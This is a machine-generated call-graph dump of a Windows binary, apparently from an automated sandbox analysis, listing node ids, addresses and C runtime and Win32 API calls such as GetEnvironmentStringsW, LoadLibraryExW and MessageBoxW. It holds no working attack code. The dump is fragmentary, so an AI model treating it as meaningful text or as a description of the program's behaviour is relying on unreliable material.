__dosmaperr 14 API calls 16839->16841 16843 f5e606 __dosmaperr 14 API calls 16840->16843 16845 f60aef 16840->16845 16842 f60aba 16841->16842 16844 f5e619 __dosmaperr 14 API calls 16842->16844 16846 f60afa 16843->16846 16848 f60ac2 16844->16848 16845->16831 16847 f5e619 __dosmaperr 14 API calls 16846->16847 16849 f60b02 16847->16849 16848->16831 16850 f63b33 _mbstowcs 25 API calls 16849->16850 16850->16848 16854 f63f40 16851->16854 16852 f64037 16852->16802 16852->16803 16852->16806 16852->16808 16853 f63fa7 ReadFile 16853->16854 16854->16852 16854->16853 16855 f64bdd __fread_nolock 27 API calls 16854->16855 16855->16854 16857 f67948 MultiByteToWideChar 16856->16857 16857->16801 16859->16772 16861 f663ab __dosmaperr 14 API calls 16860->16861 16862 f63ada 16861->16862 16863 f63ae8 16862->16863 16868 f63b43 IsProcessorFeaturePresent 16862->16868 16863->16695 16865 f63b32 16866 f63acf _mbstowcs 25 API calls 16865->16866 16867 f63b3f 16866->16867 16867->16695 16869 f63b4f 16868->16869 16872 f63987 16869->16872 16873 f639a3 _mbstowcs __fread_nolock 16872->16873 16874 f639cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16873->16874 16875 f63aa0 _mbstowcs 16874->16875 16878 f596fa 16875->16878 16877 f63abe GetCurrentProcess TerminateProcess 16877->16865 16879 f59703 IsProcessorFeaturePresent 16878->16879 16880 f59702 16878->16880 16882 f599c3 16879->16882 16880->16877 16885 f59986 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16882->16885 16884 f59aa6 16884->16877 16885->16884 16891 f67031 __dosmaperr 16886->16891 16887 f6705c RtlAllocateHeap 16889 f6706f 16887->16889 16887->16891 16888 f67071 16890 f5e619 __dosmaperr 13 API calls 16888->16890 16889->16699 16890->16889 16891->16887 16891->16888 16892 f6adc6 __dosmaperr 2 API calls 16891->16892 16892->16891 17595 f58d20 17596 f5e365 ___vcrt_freefls@4 14 API calls 17595->17596 17597 f58d29 17596->17597 21091 f620a0 21092 f620a9 21091->21092 21095 f620bf 21091->21095 21092->21095 21097 f620f8 21092->21097 21094 f620b6 21094->21095 21110 f623a5 21094->21110 21098 f62104 21097->21098 21099 f62101 21097->21099 21118 f6a1a7 21098->21118 21099->21094 21104 f62116 21106 f63b77 _free 14 API calls 21104->21106 21108 f62145 21106->21108 21108->21094 21109 f63b77 _free 14 API calls 21109->21104 21111 f62416 21110->21111 21116 f623b4 21110->21116 21111->21095 21112 f680d7 WideCharToMultiByte __wsopen_s 21112->21116 21113 f67024 __dosmaperr 14 API calls 21113->21116 21114 f6241a 21115 f63b77 _free 14 API calls 21114->21115 21115->21111 21116->21111 21116->21112 21116->21113 21116->21114 21117 f63b77 _free 14 API calls 21116->21117 21117->21116 21119 f6a1b0 21118->21119 21120 f6210b 21118->21120 21153 f66311 21119->21153 21124 f6a42c GetEnvironmentStringsW 21120->21124 21125 f6a443 21124->21125 21126 f6a499 21124->21126 21129 f680d7 __wsopen_s WideCharToMultiByte 21125->21129 21127 f6a4a2 FreeEnvironmentStringsW 21126->21127 21128 f62110 21126->21128 21127->21128 21128->21104 21136 f62199 21128->21136 21130 f6a45c 21129->21130 21130->21126 21131 f65ba2 __fread_nolock 15 API calls 21130->21131 21132 f6a46c 21131->21132 21133 f6a484 21132->21133 21134 f680d7 __wsopen_s WideCharToMultiByte 21132->21134 21135 f63b77 _free 14 API calls 21133->21135 21134->21133 21135->21126 21137 f621ae 21136->21137 21138 f67024 __dosmaperr 14 API calls 21137->21138 21148 f621d5 21138->21148 21139 f6223a 21140 f63b77 _free 14 API calls 21139->21140 21141 f62121 21140->21141 21141->21109 21142 f67024 __dosmaperr 14 API calls 21142->21148 21143 f6223c 21144 f62376 14 API calls 21143->21144 21146 f62242 21144->21146 21145 f62fa8 25 API calls 21145->21148 21149 f63b77 _free 14 API calls 21146->21149 21147 f6225c 21150 f63b43 __wsopen_s 11 API calls 21147->21150 21148->21139 21148->21142 21148->21143 21148->21145 21148->21147 21151 f63b77 _free 14 API calls 21148->21151 21149->21139 21152 f62268 21150->21152 21151->21148 21154 f66322 21153->21154 21155 f6631c 21153->21155 21157 f673ac __dosmaperr 6 API calls 21154->21157 21177 f66328 21154->21177 21156 f6736d __dosmaperr 6 API calls 21155->21156 21156->21154 21158 f6633c 21157->21158 21160 f67024 __dosmaperr 14 API calls 21158->21160 21158->21177 21159 f63002 _mbstowcs 37 API calls 21161 f663aa 21159->21161 21162 f6634c 21160->21162 21164 f66354 21162->21164 21165 f66369 21162->21165 21163 f663a1 21178 f69ff3 21163->21178 21167 f673ac __dosmaperr 6 API calls 21164->21167 21166 f673ac __dosmaperr 6 API calls 21165->21166 21169 f66375 21166->21169 21168 f66360 21167->21168 21172 f63b77 _free 14 API calls 21168->21172 21170 f66388 21169->21170 21171 f66379 21169->21171 21174 f66082 __dosmaperr 14 API calls 21170->21174 21173 f673ac __dosmaperr 6 API calls 21171->21173 21172->21177 21173->21168 21175 f66393 21174->21175 21176 f63b77 _free 14 API calls 21175->21176 21176->21177 21177->21159 21177->21163 21179 f6a107 _mbstowcs 37 API calls 21178->21179 21180 f6a006 21179->21180 21197 f69d9d 21180->21197 21183 f6a01f 21183->21120 21184 f65ba2 __fread_nolock 15 API calls 21185 f6a030 21184->21185 21196 f6a062 21185->21196 21204 f6a202 21185->21204 21188 f63b77 _free 14 API calls 21190 f6a070 21188->21190 21189 f6a05d 21191 f5e619 __dosmaperr 14 API calls 21189->21191 21190->21120 21191->21196 21192 f6a0a4 21192->21196 21215 f69c8f 21192->21215 21193 f6a078 21193->21192 21194 f63b77 _free 14 API calls 21193->21194 21194->21192 21196->21188 21198 f5c80e _mbstowcs 37 API calls 21197->21198 21199 f69daf 21198->21199 21200 f69dd0 21199->21200 21201 f69dbe GetOEMCP 21199->21201 21202 f69dd5 GetACP 21200->21202 21203 f69de7 21200->21203 21201->21203 21202->21203 21203->21183 21203->21184 21205 f69d9d 39 API calls 21204->21205 21206 f6a222 21205->21206 21208 f6a25c IsValidCodePage 21206->21208 21212 f6a298 __fread_nolock 21206->21212 21207 f596fa _ValidateLocalCookies 5 API calls 21209 f6a055 21207->21209 21210 f6a26e 21208->21210 21208->21212 21209->21189 21209->21193 21211 f6a29d GetCPInfo 21210->21211 21214 f6a277 __fread_nolock 21210->21214 21211->21212 21211->21214 21212->21207 21223 f69e73 21214->21223 21216 f69c9b ___scrt_is_nonwritable_in_current_image 21215->21216 21301 f68793 EnterCriticalSection 21216->21301 21218 f69ca5 21302 f69cdc 21218->21302 21224 f69e9b GetCPInfo 21223->21224 21225 f69f64 21223->21225 21224->21225 21231 f69eb3 21224->21231 21226 f596fa _ValidateLocalCookies 5 API calls 21225->21226 21228 f69ff1 21226->21228 21228->21212 21234 f6a7d9 21231->21234 21235 f5c80e _mbstowcs 37 API calls 21234->21235 21236 f6a7f9 21235->21236 21237 f67937 _mbstowcs MultiByteToWideChar 21236->21237 21239 f6a826 21237->21239 21238 f6a8b7 21240 f596fa _ValidateLocalCookies 5 API calls 21238->21240 21239->21238 21241 f65ba2 __fread_nolock 15 API calls 21239->21241 21245 f6a84c __fread_nolock 21239->21245 21242 f69f1b 21240->21242 21241->21245 21249 f6f3fa 21242->21249 21243 f6a8b1 21254 f6a8dc 21243->21254 21245->21243 21246 f67937 _mbstowcs MultiByteToWideChar 21245->21246 21247 f6a89a 21246->21247 21247->21243 21248 f6a8a1 GetStringTypeW 21247->21248 21248->21243 21250 f5c80e _mbstowcs 37 API calls 21249->21250 21251 f6f40d 21250->21251 21258 f6f210 21251->21258 21255 f6a8f9 21254->21255 21256 f6a8e8 21254->21256 21255->21238 21256->21255 21257 f63b77 _free 14 API calls 21256->21257 21257->21255 21259 f6f22b 21258->21259 21301->21218 21303 f5b9d8 __fread_nolock 25 API calls 21302->21303 21304 f69cfe 21303->21304 21305 f5b9d8 __fread_nolock 25 API calls 21304->21305 21306 f69d1d 21305->21306 21307 f63b77 _free 14 API calls 21306->21307 21308 f69cb2 21306->21308 21307->21308 21309 f69cd0 21308->21309 21312 f687db LeaveCriticalSection 21309->21312 21311 f69cbe 21311->21196 21312->21311 22017 f67a2f 22018 f67bd2 22017->22018 22021 f67a59 22017->22021 22019 f5e619 __dosmaperr 14 API calls 22018->22019 22020 f67bbd 22019->22020 22022 f596fa _ValidateLocalCookies 5 API calls 22020->22022 22021->22018 22024 f67aa4 22021->22024 22023 f67bef 22022->22023 22038 f6dbb4 22024->22038 22028 f67ad8 22029 f67bf1 22028->22029 22053 f6d299 22028->22053 22031 f63b43 __wsopen_s 11 API calls 22029->22031 22033 f67bfd 22031->22033 22032 f67aea 22032->22029 22060 f6d2c5 22032->22060 22035 f67afc 22035->22029 22036 f67b05 22035->22036 22036->22020 22067 f6dc11 22036->22067 22039 f6dbc0 ___scrt_is_nonwritable_in_current_image 22038->22039 22040 f67ac4 22039->22040 22075 f68793 EnterCriticalSection 22039->22075 22046 f6d26d 22040->22046 22042 f6dbd1 22043 f6dbe5 22042->22043 22076 f6da8d 22042->22076 22094 f6dc08 22043->22094 22047 f6d28e 22046->22047 22048 f6d279 22046->22048 22047->22028 22049 f5e619 __dosmaperr 14 API calls 22048->22049 22050 f6d27e 22049->22050 22051 f63b33 _mbstowcs 25 API calls 22050->22051 22052 f6d289 22051->22052 22052->22028 22054 f6d2a5 22053->22054 22055 f6d2ba 22053->22055 22056 f5e619 __dosmaperr 14 API calls 22054->22056 22055->22032 22057 f6d2aa 22056->22057 22058 f63b33 _mbstowcs 25 API calls 22057->22058 22059 f6d2b5 22058->22059 22059->22032 22061 f6d2e6 22060->22061 22062 f6d2d1 22060->22062 22061->22035 22063 f5e619 __dosmaperr 14 API calls 22062->22063 22064 f6d2d6 22063->22064 22065 f63b33 _mbstowcs 25 API calls 22064->22065 22066 f6d2e1 22065->22066 22066->22035 22068 f6dc1d ___scrt_is_nonwritable_in_current_image 22067->22068 22319 f68793 EnterCriticalSection 22068->22319 22070 f6dc28 22320 f6d2f1 22070->22320 22075->22042 22077 f6dad9 22076->22077 22078 f65ba2 __fread_nolock 15 API calls 22077->22078 22093 f6dae0 22077->22093 22086 f6daff 22078->22086 22079 f6db57 22160 f6d933 22079->22160 22081 f6db4e 22097 f6d692 22081->22097 22083 f6db54 22085 f63b77 _free 14 API calls 22083->22085 22084 f6db06 22088 f63b77 _free 14 API calls 22084->22088 22087 f6db62 22085->22087 22086->22084 22089 f6db2e 22086->22089 22090 f596fa _ValidateLocalCookies 5 API calls 22087->22090 22088->22093 22091 f63b77 _free 14 API calls 22089->22091 22092 f6db70 22090->22092 22091->22093 22092->22043 22093->22079 22093->22081 22318 f687db LeaveCriticalSection 22094->22318 22096 f6dc0f 22096->22040 22098 f6d6a2 22097->22098 22099 f6d2c5 25 API calls 22098->22099 22100 f6d6c1 22099->22100 22101 f6d26d 25 API calls 22100->22101 22122 f6d926 22100->22122 22104 f6d6d3 22101->22104 22102 f63b43 __wsopen_s 11 API calls 22103 f6d932 22102->22103 22106 f6d2c5 25 API calls 22103->22106 22105 f65ba2 __fread_nolock 15 API calls 22104->22105 22107 f6d920 22104->22107 22104->22122 22108 f6d73e 22105->22108 22109 f6d960 22106->22109 22107->22083 22112 f63b77 _free 14 API calls 22108->22112 22156 f6d903 22108->22156 22110 f6da82 22109->22110 22113 f6d26d 25 API calls 22109->22113 22114 f63b43 __wsopen_s 11 API calls 22110->22114 22111 f63b77 _free 14 API calls 22111->22107 22115 f6d754 22112->22115 22116 f6d972 22113->22116 22121 f6da8c 22114->22121 22117 f68911 25 API calls 22115->22117 22116->22110 22118 f6d299 25 API calls 22116->22118 22119 f6d782 22117->22119 22120 f6d984 22118->22120 22119->22122 22136 f6d78d __fread_nolock 22119->22136 22120->22110 22123 f6d98d 22120->22123 22125 f65ba2 __fread_nolock 15 API calls 22121->22125 22140 f6dae0 22121->22140 22122->22102 22124 f63b77 _free 14 API calls 22123->22124 22126 f6d998 GetTimeZoneInformation 22124->22126 22134 f6daff 22125->22134 22143 f6da5c 22126->22143 22145 f6d9b4 __fread_nolock 22126->22145 22127 f6db57 22128 f6d933 42 API calls 22127->22128 22131 f6db54 22128->22131 22129 f6db4e 22130 f6d692 42 API calls 22129->22130 22130->22131 22133 f63b77 _free 14 API calls 22131->22133 22132 f6db06 22137 f63b77 _free 14 API calls 22132->22137 22135 f6db62 22133->22135 22134->22132 22138 f6db2e 22134->22138 22139 f596fa _ValidateLocalCookies 5 API calls 22135->22139 22197 f6d64b 22136->22197 22137->22140 22141 f63b77 _free 14 API calls 22138->22141 22142 f6db70 22139->22142 22140->22127 22140->22129 22141->22140 22142->22083 22143->22083 22273 f6a531 22145->22273 22146 f6d7d8 22269 f65c35 22146->22269 22151 f6da48 22153 f6db72 42 API calls 22151->22153 22153->22143 22154 f6d89e 22154->22156 22157 f6d64b 42 API calls 22154->22157 22155 f65c35 38 API calls 22158 f6d849 22155->22158 22156->22111 22157->22156 22158->22154 22159 f65c35 38 API calls 22158->22159 22159->22154 22161 f6d943 22160->22161 22162 f6d2c5 25 API calls 22161->22162 22163 f6d960 22162->22163 22164 f6da82 22163->22164 22165 f6d26d 25 API calls 22163->22165 22166 f63b43 __wsopen_s 11 API calls 22164->22166 22167 f6d972 22165->22167 22170 f6da8c 22166->22170 22167->22164 22168 f6d299 25 API calls 22167->22168 22169 f6d984 22168->22169 22169->22164 22171 f6d98d 22169->22171 22173 f65ba2 __fread_nolock 15 API calls 22170->22173 22191 f6dae0 22170->22191 22172 f63b77 _free 14 API calls 22171->22172 22174 f6d998 GetTimeZoneInformation 22172->22174 22183 f6daff 22173->22183 22181 f6da5c 22174->22181 22186 f6d9b4 __fread_nolock 22174->22186 22175 f6db57 22176 f6d933 42 API calls 22175->22176 22179 f6db54 22176->22179 22177 f6db4e 22178 f6d692 42 API calls 22177->22178 22178->22179 22182 f63b77 _free 14 API calls 22179->22182 22180 f6db06 22185 f63b77 _free 14 API calls 22180->22185 22181->22083 22184 f6db62 22182->22184 22183->22180 22187 f6db2e 22183->22187 22188 f596fa _ValidateLocalCookies 5 API calls 22184->22188 22185->22191 22192 f6a531 37 API calls 22186->22192 22189 f63b77 _free 14 API calls 22187->22189 22190 f6db70 22188->22190 22189->22191 22190->22083 22191->22175 22191->22177 22193 f6da37 22192->22193 22194 f6db72 42 API calls 22193->22194 22195 f6da48 22194->22195 22196 f6db72 42 API calls 22195->22196 22196->22181 22198 f69768 25 API calls 22197->22198 22199 f6d660 22198->22199 22200 f6d667 22199->22200 22201 f6d685 22199->22201 22202 f5eb8a 37 API calls 22200->22202 22203 f63b43 __wsopen_s 11 API calls 22201->22203 22204 f6d67a 22202->22204 22207 f6d691 22203->22207 22205 f680d7 __wsopen_s WideCharToMultiByte 22204->22205 22206 f6d680 22205->22206 22206->22146 22208 f6d2c5 25 API calls 22207->22208 22209 f6d6c1 22208->22209 22210 f6d926 22209->22210 22211 f6d26d 25 API calls 22209->22211 22212 f63b43 __wsopen_s 11 API calls 22210->22212 22214 f6d6d3 22211->22214 22213 f6d932 22212->22213 22216 f6d2c5 25 API calls 22213->22216 22214->22210 22215 f65ba2 __fread_nolock 15 API calls 22214->22215 22217 f6d920 22214->22217 22218 f6d73e 22215->22218 22219 f6d960 22216->22219 22217->22146 22222 f63b77 _free 14 API calls 22218->22222 22267 f6d903 22218->22267 22220 f6da82 22219->22220 22223 f6d26d 25 API calls 22219->22223 22224 f63b43 __wsopen_s 11 API calls 22220->22224 22221 f63b77 _free 14 API calls 22221->22217 22225 f6d754 22222->22225 22226 f6d972 22223->22226 22227 f6da8c 22224->22227 22228 f68911 25 API calls 22225->22228 22226->22220 22229 f6d299 25 API calls 22226->22229 22234 f65ba2 __fread_nolock 15 API calls 22227->22234 22249 f6dae0 22227->22249 22230 f6d782 22228->22230 22231 f6d984 22229->22231 22230->22210 22245 f6d78d __fread_nolock 22230->22245 22231->22220 22232 f6d98d 22231->22232 22243 f6daff 22234->22243 22236 f6db57 22238 f6db4e 22253 f6d64b 42 API calls 22245->22253 22249->22236 22249->22238 22267->22221 22270 f65c50 22269->22270 22293 f6329a 22270->22293 22274 f66254 _mbstowcs 37 API calls 22273->22274 22275 f6a53c 22274->22275 22276 f664a6 _mbstowcs 37 API calls 22275->22276 22277 f6a54c 22276->22277 22278 f6db72 22277->22278 22279 f69768 25 API calls 22278->22279 22280 f6db86 22279->22280 22281 f6dba7 22280->22281 22282 f6db8d 22280->22282 22284 f63b43 __wsopen_s 11 API calls 22281->22284 22283 f680d7 __wsopen_s WideCharToMultiByte 22282->22283 22285 f6dba2 22283->22285 22286 f6dbb3 ___scrt_is_nonwritable_in_current_image 22284->22286 22285->22151 22287 f6dbf8 22286->22287 22317 f68793 EnterCriticalSection 22286->22317 22287->22151 22289 f6dbd1 22290 f6dbe5 22289->22290 22291 f6da8d 43 API calls 22289->22291 22291->22290 22294 f5e044 25 API calls 22293->22294 22297 f632af 22294->22297 22295 f632e8 22298 f5c80e _mbstowcs 37 API calls 22295->22298 22296 f632c4 22299 f5e619 __dosmaperr 14 API calls 22296->22299 22297->22295 22297->22296 22310 f632d4 22297->22310 22303 f632f7 22298->22303 22300 f632c9 22299->22300 22302 f63b33 _mbstowcs 25 API calls 22300->22302 22301 f61b3f GetStringTypeW 22301->22303 22302->22310 22303->22301 22305 f63321 22303->22305 22310->22154 22310->22155 22317->22289 22318->22096 22319->22070 22321 f6d26d 25 API calls 22320->22321 22322 f6d309 22321->22322 22323 f6d312 22322->22323 22324 f6d500 22322->22324 22327 f6d342 22323->22327 22328 f6d43c 22323->22328 22333 f6d437 22323->22333 22325 f63b43 __wsopen_s 11 API calls 22324->22325 22326 f6d50a 22325->22326 22339 f6d50b 22327->22339 22329 f6d50b 25 API calls 22328->22329 22330 f6d462 22329->22330 22331 f6d50b 25 API calls 22330->22331 22331->22333 22336 f6dc5c 22333->22336 22335 f6d50b 25 API calls 22335->22333 22346 f687db LeaveCriticalSection 22336->22346 22338 f6dc47 22338->22020 22340 f6d522 22339->22340 22341 f6d299 25 API calls 22340->22341 22343 f6d3be 22340->22343 22342 f6d5f8 22341->22342 22342->22343 22344 f63b43 __wsopen_s 11 API calls 22342->22344 22343->22335 22345 f6d64a 22344->22345 22346->22338 21316 f60b95 21317 f60ba1 ___scrt_is_nonwritable_in_current_image 21316->21317 21322 f68793 EnterCriticalSection 21317->21322 21319 f60bb0 21323 f60c10 21319->21323 21322->21319 21326 f687db LeaveCriticalSection 21323->21326 21325 f60c02 21326->21325 16893 f56290 16898 f56990 16893->16898 16895 f5629f LoadLibraryExW 16913 f5e365 16895->16913 16899 f569f6 16898->16899 16900 f5699a MultiByteToWideChar 16898->16900 16901 f569fa MultiByteToWideChar 16899->16901 16902 f569b4 16900->16902 16907 f569cb 16900->16907 16903 f56a13 16901->16903 16904 f56a2a 16901->16904 16916 f52290 GetLastError 16902->16916 16908 f52290 51 API calls 16903->16908 16904->16895 16907->16901 16909 f569df 16907->16909 16910 f56a22 16908->16910 16911 f52290 51 API calls 16909->16911 16910->16895 16912 f569ee 16911->16912 16912->16895 16914 f63b77 _free 14 API calls 16913->16914 16915 f562b7 16914->16915 16917 f522d5 16916->16917 16928 f5e312 16917->16928 16921 f522e9 16945 f51a90 16921->16945 16925 f5231b 16926 f596fa _ValidateLocalCookies 5 API calls 16925->16926 16927 f5232e 16926->16927 16927->16895 16961 f5bfb2 16928->16961 16931 f565b0 16932 f565ba __wsopen_s 16931->16932 16933 f565d3 GetLastError 16932->16933 16934 f565d9 FormatMessageW 16932->16934 16933->16934 16935 f565fc 16934->16935 16936 f56628 16934->16936 16937 f52290 51 API calls 16935->16937 17574 f56a30 16936->17574 16939 f5660b 16937->16939 16941 f596fa _ValidateLocalCookies 5 API calls 16939->16941 16940 f5663c 16942 f596fa _ValidateLocalCookies 5 API calls 16940->16942 16943 f56621 16941->16943 16944 f5665e 16942->16944 16943->16921 16944->16921 16946 f51aa8 16945->16946 16947 f5e312 44 API calls 16946->16947 16948 f51ab6 16947->16948 16949 f52420 16948->16949 16950 f5242a __fread_nolock __wsopen_s 16949->16950 16951 f56990 51 API calls 16950->16951 16952 f5246c 16951->16952 16953 f52473 16952->16953 16954 f524b9 MessageBoxA 16952->16954 16956 f56990 51 API calls 16953->16956 16955 f596fa _ValidateLocalCookies 5 API calls 16954->16955 16957 f524da 16955->16957 16958 f52483 MessageBoxW 16956->16958 16957->16925 16959 f596fa _ValidateLocalCookies 5 API calls 16958->16959 16960 f524b2 16959->16960 16960->16925 16962 f5bff2 16961->16962 16963 f5bfda 16961->16963 16962->16963 16965 f5bffa 16962->16965 16964 f5e619 __dosmaperr 14 API calls 16963->16964 16966 f5bfdf 16964->16966 16976 f5c80e 16965->16976 16968 f63b33 _mbstowcs 25 API calls 16966->16968 16974 f5bfea 16968->16974 16969 f596fa _ValidateLocalCookies 5 API calls 16971 f522e3 16969->16971 16970 f5c00a 16984 f5cb0f 16970->16984 16971->16931 16974->16969 16977 f5c82e 16976->16977 16983 f5c825 16976->16983 16977->16983 17000 f66254 GetLastError 16977->17000 16983->16970 17207 f5e044 16984->17207 16986 f5c091 16997 f5c891 16986->16997 16987 f5cb2f 16988 f5e619 __dosmaperr 14 API calls 16987->16988 16989 f5cb34 16988->16989 16990 f63b33 _mbstowcs 25 API calls 16989->16990 16990->16986 16991 f5cb20 16991->16986 16991->16987 17214 f5cdb9 16991->17214 17222 f5d642 16991->17222 17227 f5cea0 16991->17227 17232 f5ceed 16991->17232 17261 f5d1b3 16991->17261 16998 f63b77 _free 14 API calls 16997->16998 16999 f5c8a1 16998->16999 16999->16974 17001 f6626b 17000->17001 17004 f66271 17000->17004 17035 f6736d 17001->17035 17024 f66277 SetLastError 17004->17024 17040 f673ac 17004->17040 17006 f67024 __dosmaperr 14 API calls 17008 f6629f 17006->17008 17011 f662a7 17008->17011 17012 f662be 17008->17012 17009 f5c84e 17027 f664a6 17009->17027 17010 f6630b 17050 f63002 17010->17050 17015 f673ac __dosmaperr 6 API calls 17011->17015 17014 f673ac __dosmaperr 6 API calls 17012->17014 17018 f662ca 17014->17018 17016 f662b5 17015->17016 17021 f63b77 _free 14 API calls 17016->17021 17019 f662ce 17018->17019 17020 f662df 17018->17020 17022 f673ac __dosmaperr 6 API calls 17019->17022 17045 f66082 17020->17045 17021->17024 17022->17016 17024->17009 17024->17010 17028 f5c864 17027->17028 17029 f664b9 17027->17029 17031 f664d3 17028->17031 17029->17028 17164 f6abc5 17029->17164 17032 f664e6 17031->17032 17033 f664fb 17031->17033 17032->17033 17186 f6a1ef 17032->17186 17033->16983 17036 f671b0 __dosmaperr 5 API calls 17035->17036 17037 f67389 17036->17037 17038 f673a4 TlsGetValue 17037->17038 17039 f67392 17037->17039 17039->17004 17041 f671b0 __dosmaperr 5 API calls 17040->17041 17042 f673c8 17041->17042 17043 f673e6 TlsSetValue 17042->17043 17044 f6628f 17042->17044 17044->17006 17044->17024 17061 f65f16 17045->17061 17117 f60cda 17050->17117 17054 f6303b 17058 f62867 _mbstowcs 23 API calls 17054->17058 17055 f6301c IsProcessorFeaturePresent 17057 f63028 17055->17057 17056 f63012 17056->17054 17056->17055 17059 f63987 _mbstowcs 8 API calls 17057->17059 17060 f63045 17058->17060 17059->17054 17062 f65f22 ___scrt_is_nonwritable_in_current_image 17061->17062 17075 f68793 EnterCriticalSection 17062->17075 17064 f65f2c 17076 f65f5c 17064->17076 17067 f66028 17068 f66034 ___scrt_is_nonwritable_in_current_image 17067->17068 17080 f68793 EnterCriticalSection 17068->17080 17070 f6603e 17081 f66209 17070->17081 17072 f66056 17085 f66076 17072->17085 17075->17064 17079 f687db LeaveCriticalSection 17076->17079 17078 f65f4a 17078->17067 17079->17078 17080->17070 17082 f66218 _mbstowcs 17081->17082 17084 f6623f _mbstowcs 17081->17084 17082->17084 17088 f6a979 17082->17088 17084->17072 17116 f687db LeaveCriticalSection 17085->17116 17090 f6a9f9 17088->17090 17091 f6a98f 17088->17091 17092 f63b77 _free 14 API calls 17090->17092 17115 f6aa47 17090->17115 17091->17090 17096 f63b77 _free 14 API calls 17091->17096 17112 f6a9c2 17091->17112 17093 f6aa1b 17092->17093 17114 f6a9e4 17112->17114 17147 f60b12 17117->17147 17120 f60d1f 17121 f60d2b ___scrt_is_nonwritable_in_current_image 17120->17121 17122 f663ab __dosmaperr 14 API calls 17121->17122 17123 f60d52 _mbstowcs 17121->17123 17127 f60d58 _mbstowcs 17121->17127 17122->17123 17124 f60d9f 17123->17124 17123->17127 17130 f60d89 17123->17130 17125 f5e619 __dosmaperr 14 API calls 17124->17125 17126 f60da4 17125->17126 17128 f63b33 _mbstowcs 25 API calls 17126->17128 17129 f60dcb 17127->17129 17157 f68793 EnterCriticalSection 17127->17157 17128->17130 17133 f60efe 17129->17133 17136 f60e0d 17129->17136 17144 f60e3c 17129->17144 17130->17056 17134 f60f09 17133->17134 17162 f687db LeaveCriticalSection 17133->17162 17138 f62867 _mbstowcs 23 API calls 17134->17138 17139 f66254 _mbstowcs 37 API calls 17136->17139 17136->17144 17140 f60f11 17138->17140 17142 f60e31 17139->17142 17141 f66254 _mbstowcs 37 API calls 17145 f60e91 17141->17145 17143 f66254 _mbstowcs 37 API calls 17142->17143 17143->17144 17158 f60eab 17144->17158 17145->17130 17146 f66254 _mbstowcs 37 API calls 17145->17146 17146->17130 17148 f60b1e ___scrt_is_nonwritable_in_current_image 17147->17148 17153 f68793 EnterCriticalSection 17148->17153 17150 f60b2c 17154 f60b6a 17150->17154 17153->17150 17155 f687db __wsopen_s LeaveCriticalSection 17154->17155 17156 f60b53 17155->17156 17156->17056 17156->17120 17157->17129 17159 f60eb1 17158->17159 17160 f60e82 17158->17160 17163 f687db LeaveCriticalSection 17159->17163 17160->17130 17160->17141 17160->17145 17162->17134 17163->17160 17165 f6abd1 ___scrt_is_nonwritable_in_current_image 17164->17165 17166 f66254 _mbstowcs 37 API calls 17165->17166 17167 f6abda 17166->17167 17174 f6ac20 17167->17174 17177 f68793 EnterCriticalSection 17167->17177 17169 f6abf8 17178 f6ac46 17169->17178 17174->17028 17175 f63002 _mbstowcs 37 API calls 17176 f6ac45 17175->17176 17177->17169 17179 f6ac54 _mbstowcs 17178->17179 17181 f6ac09 17178->17181 17180 f6a979 _mbstowcs 14 API calls 17179->17180 17179->17181 17180->17181 17182 f6ac25 17181->17182 17185 f687db LeaveCriticalSection 17182->17185 17184 f6ac1c 17184->17174 17184->17175 17185->17184 17187 f66254 _mbstowcs 37 API calls 17186->17187 17188 f6a1f9 17187->17188 17191 f6a107 17188->17191 17192 f6a113 ___scrt_is_nonwritable_in_current_image 17191->17192 17198 f6a12d 17192->17198 17202 f68793 EnterCriticalSection 17192->17202 17194 f6a13d 17200 f63b77 _free 14 API calls 17194->17200 17201 f6a169 17194->17201 17195 f6a134 17195->17033 17197 f63002 _mbstowcs 37 API calls 17199 f6a1a6 17197->17199 17198->17195 17198->17197 17200->17201 17203 f6a186 17201->17203 17202->17194 17206 f687db LeaveCriticalSection 17203->17206 17205 f6a18d 17205->17198 17206->17205 17208 f5e05c 17207->17208 17209 f5e049 17207->17209 17208->16991 17210 f5e619 __dosmaperr 14 API calls 17209->17210 17211 f5e04e 17210->17211 17212 f63b33 _mbstowcs 25 API calls 17211->17212 17213 f5e059 17212->17213 17213->16991 17283 f5cdf7 17214->17283 17216 f5cdbe 17217 f5cdd5 17216->17217 17218 f5e619 __dosmaperr 14 API calls 17216->17218 17217->16991 17219 f5cdc7 17218->17219 17220 f63b33 _mbstowcs 25 API calls 17219->17220 17221 f5cdd2 17220->17221 17221->16991 17223 f5d652 17222->17223 17224 f5d64b 17222->17224 17223->16991 17292 f5ca25 17224->17292 17228 f5ceb0 17227->17228 17229 f5cea9 17227->17229 17228->16991 17230 f5ca25 40 API calls 17229->17230 17231 f5ceaf 17230->17231 17231->16991 17233 f5cef4 17232->17233 17234 f5cf0e 17232->17234 17235 f5cf3e 17233->17235 17236 f5d1cc 17233->17236 17237 f5d238 17233->17237 17234->17235 17238 f5e619 __dosmaperr 14 API calls 17234->17238 17235->16991 17249 f5d20f 17236->17249 17252 f5d1d8 17236->17252 17240 f5d23f 17237->17240 17241 f5d27e 17237->17241 17237->17249 17239 f5cf2a 17238->17239 17242 f63b33 _mbstowcs 25 API calls 17239->17242 17245 f5d1e6 17240->17245 17246 f5d244 17240->17246 17363 f5dee9 17241->17363 17243 f5cf35 17242->17243 17243->16991 17258 f5d1f4 17245->17258 17260 f5d208 17245->17260 17357 f5d7b0 17245->17357 17246->17249 17251 f5d249 17246->17251 17249->17258 17249->17260 17348 f5db91 17249->17348 17250 f5d21f 17250->17260 17334 f5da68 17250->17334 17253 f5d25c 17251->17253 17254 f5d24e 17251->17254 17252->17245 17252->17250 17252->17258 17342 f5de37 17253->17342 17254->17260 17338 f5deab 17254->17338 17258->17260 17366 f5e0e6 17258->17366 17260->16991 17262 f5d1cc 17261->17262 17263 f5d238 17261->17263 17271 f5d20f 17262->17271 17273 f5d1d8 17262->17273 17264 f5d23f 17263->17264 17265 f5d27e 17263->17265 17263->17271 17266 f5d244 17264->17266 17275 f5d1e6 17264->17275 17267 f5dee9 26 API calls 17265->17267 17270 f5d249 17266->17270 17266->17271 17280 f5d1f4 17267->17280 17268 f5db91 26 API calls 17268->17280 17269 f5d7b0 40 API calls 17269->17280 17274 f5d25c 17270->17274 17276 f5d24e 17270->17276 17271->17268 17271->17280 17282 f5d208 17271->17282 17272 f5d21f 17278 f5da68 39 API calls 17272->17278 17272->17282 17273->17272 17273->17275 17273->17280 17277 f5de37 25 API calls 17274->17277 17275->17269 17275->17280 17275->17282 17279 f5deab 26 API calls 